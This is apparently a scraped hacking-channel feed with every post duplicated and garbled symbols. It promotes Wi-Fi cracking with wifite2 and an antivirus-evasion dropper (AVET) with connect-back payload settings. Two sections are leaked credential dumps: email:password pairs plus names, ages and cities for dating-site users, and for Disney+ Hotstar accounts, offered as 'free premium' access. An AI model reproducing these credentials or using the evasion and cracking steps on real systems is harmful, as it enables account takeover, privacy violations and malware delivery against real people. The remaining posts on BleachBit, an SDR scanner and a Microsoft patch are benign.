β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WIFI HACKING TERMIX-LINUX :
instagram.com/undercodeTesting
1) git clone https://github.com/derv82/wifite2.git
2) cd wifite2
3) sudo ./Wifite.py
π¦FEATURES :
PMKID hash capture (enabled by-default, force with: --pmkid)
WPS Offline Brute-Force Attack aka "Pixie-Dust". (enabled by-default, force with: --wps-only --pixie)
WPS Online Brute-Force Attack aka "PIN attack". (enabled by-default, force with: --wps-only --no-pixie)
WPA/2 Offline Brute-Force Attack via 4-Way Handshake capture (enabled by-default, force with: --no-wps)
Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng (when available)
Various WEP attacks (replay, chopchop, fragment, hirte, p0841, caffe-latte)
Automatically decloaks hidden access points while scanning or attacking.
Note: Only works when channel is fixed. Use -c <channel>
Disable this using --no-deauths
5Ghz support for some wireless cards (via -5 switch).
Note: Some tools don't play well on 5GHz channels (e.g. aireplay-ng)
Stores cracked passwords and handshakes to the current directory (--cracked)
Includes information about the cracked access point (Name, BSSID, Date, etc).
Easy to try to crack handshakes or PMKID hashes against a wordlist (--crack)
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦WIFI HACKING TERMIX-LINUX :
instagram.com/undercodeTesting
1) git clone https://github.com/derv82/wifite2.git
2) cd wifite2
3) sudo ./Wifite.py
π¦FEATURES :
PMKID hash capture (enabled by-default, force with: --pmkid)
WPS Offline Brute-Force Attack aka "Pixie-Dust". (enabled by-default, force with: --wps-only --pixie)
WPS Online Brute-Force Attack aka "PIN attack". (enabled by-default, force with: --wps-only --no-pixie)
WPA/2 Offline Brute-Force Attack via 4-Way Handshake capture (enabled by-default, force with: --no-wps)
Validates handshakes against pyrit, tshark, cowpatty, and aircrack-ng (when available)
Various WEP attacks (replay, chopchop, fragment, hirte, p0841, caffe-latte)
Automatically decloaks hidden access points while scanning or attacking.
Note: Only works when channel is fixed. Use -c <channel>
Disable this using --no-deauths
5Ghz support for some wireless cards (via -5 switch).
Note: Some tools don't play well on 5GHz channels (e.g. aireplay-ng)
Stores cracked passwords and handshakes to the current directory (--cracked)
Includes information about the cracked access point (Name, BSSID, Date, etc).
Easy to try to crack handshakes or PMKID hashes against a wordlist (--crack)
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - derv82/wifite2: Rewrite of the popular wireless network auditor, "wifite"
Rewrite of the popular wireless network auditor, "wifite" - derv82/wifite2
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LEVO (DATING) & Chats FREE PREMIUM ACCOUNts VERFIED XD :
alextreize@live.fr:treizejuin | Name = alex82 | Gender = male | Age = 36 | Credits = 55 | VIP = 0 | City = Verdun-sur-Garonne | Country = FR |
barwita89@live.fr (barwita89@live.fr):220174 | Name = Karim | Gender = male | Age = 42 | Credits = 97 | VIP = 0 | City = Bruxelles | Country = BE |
beufa1@live.fr:etimrehl | : Name = fabien | Gender = male | Age = 41 | Credits = 20 | VIP = 0 | City = Caen | Country = FR |
raikon7g7@yahoo.fr:50 (raikon7g7@yahoo.fr:50)cent | Name = David geneva | Gender = male | Age = 30 | Credits = 105 | VIP = 0 | City = Genève | Country = CH |
antonio.cerdeira@free.fr:catherine | : Name = grosse92 | Gender = male | Age = 43 | Credits = 10 | VIP = 0 | City = Paris | Country = FR |
barbier_77@live.fr:alasco24 | : Name = KΓ©rΓ© | Gender = male | Age = 26 | Credits = 229 | VIP = 0 | Cit
alicesurgand42@outlook.fr (alicesurgand42@outlook.fr):05272481 | Name = durand2014 | Gender = male | Age = 23 | Credits = 75 | VIP = 1 | City = St Albans | Country = GB |
bada-.-boom@live.fr:EXIL95zik | Name = Ronan | Gender = male | Age = 33 | Credits = 20 | VIP = 0 | City = Nantes | Country = FR |
bastou24@aliceadsl.fr:bougnat24 |Name = seb | Gender = male | Age = 42 | Credits = 8 | VIP = 0 | City = Sarlat-la-CanΓ©da | Country = FR |
alexioo@live.fr (alexioo@live.fr):123321aa Name = allexx | Gender = male | Age = 32 | Credits = 65 | VIP = 0 | City = Gaillard | Country = FR |
rem64@live.fr:destroy360 | Name = Rem Farga | Gender = male | Age = 29 | Credits = 25 | VIP = 0 | City = Bayonne | Country = FR |
antoine.fournier59@orange.fr:473 (antoine.fournier59@orange.fr:473)cxn59 | Name = Antoine | Gender = male | Age = 34 | Credits = 0 | VIP = 0 | City = Valenciennes | Country = FR |
sebastien.boncino@wanadoo.fr:musculation | : Name = Sebastien | Gender = male | Age = 42 | Credits = 18 | VIP = 0 | City = Aubagne | Country = FR |
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦LEVO (DATING) & Chats FREE PREMIUM ACCOUNts VERFIED XD :
alextreize@live.fr:treizejuin | Name = alex82 | Gender = male | Age = 36 | Credits = 55 | VIP = 0 | City = Verdun-sur-Garonne | Country = FR |
barwita89@live.fr (barwita89@live.fr):220174 | Name = Karim | Gender = male | Age = 42 | Credits = 97 | VIP = 0 | City = Bruxelles | Country = BE |
beufa1@live.fr:etimrehl | : Name = fabien | Gender = male | Age = 41 | Credits = 20 | VIP = 0 | City = Caen | Country = FR |
raikon7g7@yahoo.fr:50 (raikon7g7@yahoo.fr:50)cent | Name = David geneva | Gender = male | Age = 30 | Credits = 105 | VIP = 0 | City = Genève | Country = CH |
antonio.cerdeira@free.fr:catherine | : Name = grosse92 | Gender = male | Age = 43 | Credits = 10 | VIP = 0 | City = Paris | Country = FR |
barbier_77@live.fr:alasco24 | : Name = KΓ©rΓ© | Gender = male | Age = 26 | Credits = 229 | VIP = 0 | Cit
alicesurgand42@outlook.fr (alicesurgand42@outlook.fr):05272481 | Name = durand2014 | Gender = male | Age = 23 | Credits = 75 | VIP = 1 | City = St Albans | Country = GB |
bada-.-boom@live.fr:EXIL95zik | Name = Ronan | Gender = male | Age = 33 | Credits = 20 | VIP = 0 | City = Nantes | Country = FR |
bastou24@aliceadsl.fr:bougnat24 |Name = seb | Gender = male | Age = 42 | Credits = 8 | VIP = 0 | City = Sarlat-la-CanΓ©da | Country = FR |
alexioo@live.fr (alexioo@live.fr):123321aa Name = allexx | Gender = male | Age = 32 | Credits = 65 | VIP = 0 | City = Gaillard | Country = FR |
rem64@live.fr:destroy360 | Name = Rem Farga | Gender = male | Age = 29 | Credits = 25 | VIP = 0 | City = Bayonne | Country = FR |
antoine.fournier59@orange.fr:473 (antoine.fournier59@orange.fr:473)cxn59 | Name = Antoine | Gender = male | Age = 34 | Credits = 0 | VIP = 0 | City = Valenciennes | Country = FR |
sebastien.boncino@wanadoo.fr:musculation | : Name = Sebastien | Gender = male | Age = 42 | Credits = 18 | VIP = 0 | City = Aubagne | Country = FR |
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated AntiVirus Evasion Tool
t.me/undercodeTesting
π¦ features:
1) when running a .exe file made with msfpayload & co, the file will often be recognized by antivirus software
2) AVET is an antivirus evasion tool targeting windows machines with executable files
3) different kinds of input payloads can be used now: shellcode, exe and dlls
4) more techniques available: shellcode/dll injection, process following and more
5) flexible retrieval methods for payload, decryption key, etc.
usage as a dropper
6) Chaining multiple iterations of AVET enables you to add multiple evasion layers, if necessary
7) combination of techniques: download your encrypted payload via powershell, while supplying the decryption key via command line argument at execution time, and finally inject your payload into another process, choosing from multiple techniques
basic sandbox checks
8) executie all available build scripts with build_script_tester.py, might also be interesting for researchers for building a set of "malicious" samples using different evasion and injection techniques
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/govolution/avet.git
2) cd avet
3) ./setup.sh
4) then run as python python3 avet.py
π¦how to use ?
# build the .exe file that loads the payload from a given text file
Configure the Build Script
# override connect-back settings here, if necessary
-> LPORT=443
-> LHOST=192.168.56.101
# no command preexec
-> set_command_source no_data
-> set_command_exec no_command
# enable debug output
-> enable_debug_print
Executable will be created Shortly please wait.
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 692 (iteration=0)
x86/shikata_ga_nai chosen with final size 692
Payload size: 692 bytes
Final size of c file: 2933 bytes
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated AntiVirus Evasion Tool
t.me/undercodeTesting
π¦ features:
1) when running a .exe file made with msfpayload & co, the file will often be recognized by antivirus software
2) AVET is an antivirus evasion tool targeting windows machines with executable files
3) different kinds of input payloads can be used now: shellcode, exe and dlls
4) more techniques available: shellcode/dll injection, process following and more
5) flexible retrieval methods for payload, decryption key, etc.
usage as a dropper
6) Chaining multiple iterations of AVET enables you to add multiple evasion layers, if necessary
7) combination of techniques: download your encrypted payload via powershell, while supplying the decryption key via command line argument at execution time, and finally inject your payload into another process, choosing from multiple techniques
basic sandbox checks
8) executie all available build scripts with build_script_tester.py, might also be interesting for researchers for building a set of "malicious" samples using different evasion and injection techniques
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/govolution/avet.git
2) cd avet
3) ./setup.sh
4) then run as python python3 avet.py
π¦how to use ?
# build the .exe file that loads the payload from a given text file
Configure the Build Script
# override connect-back settings here, if necessary
-> LPORT=443
-> LHOST=192.168.56.101
# no command preexec
-> set_command_source no_data
-> set_command_exec no_command
# enable debug output
-> enable_debug_print
Executable will be created Shortly please wait.
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 692 (iteration=0)
x86/shikata_ga_nai chosen with final size 692
Payload size: 692 bytes
Final size of c file: 2933 bytes
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated BleachBit system cleaner for Windows and Linux
twitter.com/undercodeNews
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/bleachbit/bleachbit
2) cd bleachbit
3) to run BleachBit without installation, unpack the tarball and then run these commands:
4) make -C po local # build translations
python3 bleachbit.py
Then, review the preferences.
5) Then, select some options, and click Preview. Review the files, toggle options accordingly, and click Delete.
6) For information regarding the command line interface, run:
python3 bleachbit.py --help
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 updated BleachBit system cleaner for Windows and Linux
twitter.com/undercodeNews
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/bleachbit/bleachbit
2) cd bleachbit
3) to run BleachBit without installation, unpack the tarball and then run these commands:
4) make -C po local # build translations
python3 bleachbit.py
Then, review the preferences.
5) Then, select some options, and click Preview. Review the files, toggle options accordingly, and click Delete.
6) For information regarding the command line interface, run:
python3 bleachbit.py --help
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE NEWS (@UndercodeNews) | Twitter
The latest Tweets from UNDERCODE NEWS (@UndercodeNews). We provides you daily hacking News & Security Warning & Technologies news & Bugs reports & Analysis... @UndercodeNews @UndercodeUpdate @iUndercode @DailyCve. Aus/Leb
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hack news :Microsoft releases emergency update to fix RCE vulnerabilities in Office and Paint 3D applications
recently from undercode tweets
π¦Microsoft
1) Microsoft explained in its announcement that if an attacker successfully exploited the aforementioned vulnerability, he would be able to obtain the same permissions as the logged-in user, which means that malicious actors can even obtain administrator permissions on the affected machine.
2) Microsoft explained: "There are multiple remote code execution vulnerabilities in Microsoft products, and there will be problems in calling the FBX library when processing certain specially crafted 3D content. An attacker who successfully exploited these vulnerabilities could obtain the same user as the local user. Permissions. For users with fewer permissions, the impact may be smaller. "
3) Microsoft said: "To exploit these vulnerabilities, an attacker must send a specially crafted file containing 3D content to the user and convince the user to open the file. The emergency security update released this time has fixed these vulnerabilities by fixing Microsoft software."
4) These security patches are rated as "Important". It is reported that Microsoft Office 2016, Microsoft Office 2019 and Office 365 ProPlus are affected by the vulnerability.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦hack news :Microsoft releases emergency update to fix RCE vulnerabilities in Office and Paint 3D applications
recently from undercode tweets
π¦Microsoft
1) Microsoft explained in its announcement that if an attacker successfully exploited the aforementioned vulnerability, he would be able to obtain the same permissions as the logged-in user, which means that malicious actors can even obtain administrator permissions on the affected machine.
2) Microsoft explained: "There are multiple remote code execution vulnerabilities in Microsoft products, and there will be problems in calling the FBX library when processing certain specially crafted 3D content. An attacker who successfully exploited these vulnerabilities could obtain the same user as the local user. Permissions. For users with fewer permissions, the impact may be smaller. "
3) Microsoft said: "To exploit these vulnerabilities, an attacker must send a specially crafted file containing 3D content to the user and convince the user to open the file. The emergency security update released this time has fixed these vulnerabilities by fixing Microsoft software."
4) These security patches are rated as "Important". It is reported that Microsoft Office 2016, Microsoft Office 2019 and Office 365 ProPlus are affected by the vulnerability.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ frequency scanning GUI for the OsmoSDR rtl-sdr library -termux root & linux :
t.me/undercodeTesting
π¦Tested on:
Windows 7 (x86 and x64)
Windows 8.1 (x64)
Ubuntu 12.04 (x86)
Ubuntu 12.10 (x64)
Ubuntu 13.04 (x64)
Ubuntu 14.04 (x64)
OS X Snow Leopard
OS X Mountain Lion
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/EarToEarOak/RTLSDR-Scanner
2) cd RTLSDR-Scanner
3) Run 'python -m rtlsdr_scanner'.
To start a scan simple enter the range at the bottom of the window and click 'Start', after a while a plot of signal strengths should be displayed.
'Dwell' controls how long each step is sampled for, longer times will result in more averaging of the signal.
'Continuous update' updates the display on each step. Caution only use this with small scans and low dwell times, otherwise it will become unresponsive.
'Grid' displays a grid on the scan plot.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ frequency scanning GUI for the OsmoSDR rtl-sdr library -termux root & linux :
t.me/undercodeTesting
π¦Tested on:
Windows 7 (x86 and x64)
Windows 8.1 (x64)
Ubuntu 12.04 (x86)
Ubuntu 12.10 (x64)
Ubuntu 13.04 (x64)
Ubuntu 14.04 (x64)
OS X Snow Leopard
OS X Mountain Lion
π¦πβπππΈπππππΈπππβ & βπβ :
1) git clone https://github.com/EarToEarOak/RTLSDR-Scanner
2) cd RTLSDR-Scanner
3) Run 'python -m rtlsdr_scanner'.
To start a scan simple enter the range at the bottom of the window and click 'Start', after a while a plot of signal strengths should be displayed.
'Dwell' controls how long each step is sampled for, longer times will result in more averaging of the signal.
'Continuous update' updates the display on each step. Caution only use this with small scans and low dwell times, otherwise it will become unresponsive.
'Grid' displays a grid on the scan plot.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Disney+ Hotstar vip & trial
jayasreekosal@yahoo.com:jaisriram = Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-03-13 |
shrimayeepuhan@gmail.com:munmun |
| Expiry(yyyy-MM-dd) = 2020-08-10 |
avadhutchendake@gmail.com:anjali123 | Title = Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-17 |
bindalrahil@gmail.com:bindal1972 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-24 |
sanjay4441@gmail.com:safyeast | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-03-23 |
manasheerajesh@gmail.com:raje8601 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2022-01-30 |
notes2jyoti@gmail.com:tyroon09 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-08 |
abhishekss.barwal3@gmail.com:cgsa123369 | Title = Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-02-16 |
santhoshkumar.ts1012@gmail.com:Muruga01 Telegram Title = Disney+ Hotstar Premium Monthly | Expiry(yyyy-MM-dd) = 2020-05-05 |
swarajksahoo@gmail.com:kumar123 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-03-08 |
prasad.penter@gmail.com:prasad1432 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-21 |
rimpi.ghosh12@gmail.com:aryaman13 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-03-15 |
abhishekraj222@gmail.com:abhishek | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-16 |
vipulsingh17@gmail.com:udbhav17 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2020-07-08 |
adityabahuguna@gmail.com:adi007 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2020-05-29 |
smabbas79@gmail.com:halloween1 Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-11 |
aafrin.shaikh7788@gmail.com:aafrps123 | = Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-04 |
deepti.azad92@gmail.com:ilmp17 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2020-11-07 |
gautamaro@gmail.com:jaimataki | Disney+ Hotstar Premium Monthly | Expiry(yyyy-MM-dd) = 2020-04-29 |
gautampatade11@gmail.com:7264rani | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-06 |
sanjanabolleypally31@yahoo.com:Omsairam123 | Telegram Title = | Expiry(yyyy-MM-dd) = 2020-06-19 |
mallu.asthy@gmail.com:tanitan79 |
santhoshkumar.ts1012@gmail.com:Muruga01 Telegram Title = Disney+ Hotstar Premium Monthly | Expiry(yyyy-MM-dd) = 2020-05-05 |
adityap91@gmail.com:72132028 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2020-06-08 |
Partha_Kulkarni@mentor.com:psgp2238 | = Disney+ Hotstar Premium Annual | Expiry(yyyy-MM-dd) = 2020-12-17 |
rajiv_arya3@yahoo.com:jhinjhan | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-02-21 |
sarojsingh_4@yahoo.co.in:write2me | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-01-27 |
notes2jyoti@gmail.com:tyroon09 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-08
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Disney+ Hotstar vip & trial
jayasreekosal@yahoo.com:jaisriram = Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-03-13 |
shrimayeepuhan@gmail.com:munmun |
| Expiry(yyyy-MM-dd) = 2020-08-10 |
avadhutchendake@gmail.com:anjali123 | Title = Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-17 |
bindalrahil@gmail.com:bindal1972 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-24 |
sanjay4441@gmail.com:safyeast | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-03-23 |
manasheerajesh@gmail.com:raje8601 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2022-01-30 |
notes2jyoti@gmail.com:tyroon09 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-08 |
abhishekss.barwal3@gmail.com:cgsa123369 | Title = Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-02-16 |
santhoshkumar.ts1012@gmail.com:Muruga01 Telegram Title = Disney+ Hotstar Premium Monthly | Expiry(yyyy-MM-dd) = 2020-05-05 |
swarajksahoo@gmail.com:kumar123 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-03-08 |
prasad.penter@gmail.com:prasad1432 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-21 |
rimpi.ghosh12@gmail.com:aryaman13 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-03-15 |
abhishekraj222@gmail.com:abhishek | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-16 |
vipulsingh17@gmail.com:udbhav17 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2020-07-08 |
adityabahuguna@gmail.com:adi007 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2020-05-29 |
smabbas79@gmail.com:halloween1 Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-11 |
aafrin.shaikh7788@gmail.com:aafrps123 | = Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-04 |
deepti.azad92@gmail.com:ilmp17 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2020-11-07 |
gautamaro@gmail.com:jaimataki | Disney+ Hotstar Premium Monthly | Expiry(yyyy-MM-dd) = 2020-04-29 |
gautampatade11@gmail.com:7264rani | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-06 |
sanjanabolleypally31@yahoo.com:Omsairam123 | Telegram Title = | Expiry(yyyy-MM-dd) = 2020-06-19 |
mallu.asthy@gmail.com:tanitan79 |
santhoshkumar.ts1012@gmail.com:Muruga01 Telegram Title = Disney+ Hotstar Premium Monthly | Expiry(yyyy-MM-dd) = 2020-05-05 |
adityap91@gmail.com:72132028 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2020-06-08 |
Partha_Kulkarni@mentor.com:psgp2238 | = Disney+ Hotstar Premium Annual | Expiry(yyyy-MM-dd) = 2020-12-17 |
rajiv_arya3@yahoo.com:jhinjhan | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-02-21 |
sarojsingh_4@yahoo.co.in:write2me | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-01-27 |
notes2jyoti@gmail.com:tyroon09 | Disney+ Hotstar VIP | Expiry(yyyy-MM-dd) = 2021-04-08
@UndercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β